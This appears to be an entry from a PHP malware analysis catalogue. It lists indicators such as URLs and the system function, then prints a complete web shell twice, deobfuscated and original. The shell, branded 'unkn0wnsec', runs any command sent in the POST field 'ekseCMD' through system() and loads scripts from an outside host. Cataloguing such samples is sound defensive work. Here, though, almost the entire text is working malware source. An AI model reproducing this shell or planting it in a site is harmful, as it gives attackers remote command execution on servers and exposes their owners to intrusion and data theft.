PHP Malware Analysis

Back to list

Tags

URLs
ftp.sh/main/style-fm.css
ftp.sh/typed/typed.js
Title
unkn0wnsec@cmd:#~ shell
Execution
system
Input
_GET
_POST

Deobfuscated code

<?php

if ($_GET['id'] == 'cmd') {
    if (isset($_POST['ekseCMD'])) {
        $result = $_POST['ekseCMD'];
        print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>{$result}</cmd><br>";
        system($_POST['ekseCMD'] . ' 2>&1');
    }
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php 
system("whoami", $result);
?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?php 
echo date('Y');
?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>


Original code

<?php
if($_GET['id'] == 'cmd') {
if(isset($_POST['ekseCMD'])) {
	$result = $_POST['ekseCMD'];
		print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>$result</cmd><br>";
		system($_POST['ekseCMD'].' 2>&1');
	}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php system("whoami", $result);?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?=date('Y');?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>